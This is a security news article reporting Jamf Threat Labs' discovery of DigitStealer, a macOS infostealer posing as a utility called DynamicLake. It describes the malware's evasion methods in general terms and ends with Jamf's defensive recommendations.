Jamf Threat Labs has identified a new and sophisticated macOS threat that is drawing significant attention across the security community. The malicious program, named DigitStealer, is an advanced infostealer designed to run covertly using techniques that make detection extremely difficult. Targeting macOS specifically, this threat demonstrates that attackers are continually raising their technical capabilities to bypass Apple’s security layers.
The new malware, macOS DigitStealer, targets macOS users and employs advanced evasion methods that make it hard for traditional security solutions to spot.
Discovery of DigitStealer
Jamf Threat Labs discovered DigitStealer while analyzing a file posing as a legitimate macOS utility called DynamicLake. The fake application mimicked a genuine macOS tool and, at the time of analysis, was undetected by all antivirus engines on VirusTotal. This case highlights how quickly threats are evolving and how insufficient it is for organizations to rely solely on conventional defenses.
A sophisticated infostealer with modular attack flow
DigitStealer belongs to the infostealer family, whose primary goal is to harvest sensitive data from infected machines. Infostealers have increased in prevalence and complexity over the past year. DigitStealer employs multiple layers of technical measures to avoid detection and to bypass macOS protections such as Gatekeeper and other built-in defenses.
A core aspect of DigitStealer’s effectiveness is its modular architecture and stepwise execution. Each stage performs checks to determine whether the payload should be activated. For example, DigitStealer conducts hardware checks that can distinguish a physical Mac from an analysis environment. If it detects indicators of a sandbox or virtualized environment, it can refrain from activating, making analysis and forensic work far more difficult.
Threat actors are becoming more sophisticated
Pontus Nord from Jamf outlines the trend clearly. “We see threat actors getting better at blending in, erasing traces, and abusing legitimate services and tools to distribute malware,” he says.
This level of refinement has become more common in the past year. Increasingly, macOS threats use in-memory scripting techniques and legitimate API calls to evade detection. The combination of high technical quality and the ability to mimic legitimate activity often means organizations do not discover intrusions until damage has already occurred.
In-memory attacks create serious challenges
One of DigitStealer’s most problematic features is that portions of the attack execute entirely in memory. Because the malicious code does not write to disk, signature-based antivirus solutions struggle to identify the threat. Attacks that operate only in memory require organizations to employ behavior-based monitoring capable of detecting anomalies in real time. Behavioral indicators such as unusual processes, unexpected network connections, and unauthorized access attempts become critical for detecting these sophisticated threats.
macOS is increasingly attractive to cybercriminals
DigitStealer also reflects a broader trend: macOS has become a more attractive platform for cybercriminals. Organizations that once focused mainly on Windows environments are discovering attackers are increasingly prioritizing macOS as Windows security improves. As more creators, developers, and enterprise users work on Macs, the value of stealing data from these devices has grown.
Recommendations from Jamf
Jamf offers several recommendations to strengthen defenses. Organizations should ensure that advanced threat controls and blocking capabilities are enabled in their security stack. Tools that rely solely on signatures or basic heuristics will not be sufficient against threats like DigitStealer. Companies should also exercise caution when installing software from unknown or unofficial sources, since social engineering and fake apps remain common distribution methods for this kind of malware.
Organizations should adopt a layered approach combining preventative protections with behavior-based detection. While defense-in-depth remains relevant, it must be augmented with real-time monitoring and analytics engines that can detect subtle signs of compromise. This is especially important in environments where users have administrative privileges or where third-party tools are installed outside centrally approved channels.
The threat posed by DigitStealer is a clear reminder that macOS environments can no longer be considered less vulnerable. Attackers are investing substantial resources into developing specialized malware for the Apple ecosystem, so organizations must apply the same security standards to macOS as they do to Windows and Linux.
Read the full analysis from Jamf Threat Labs: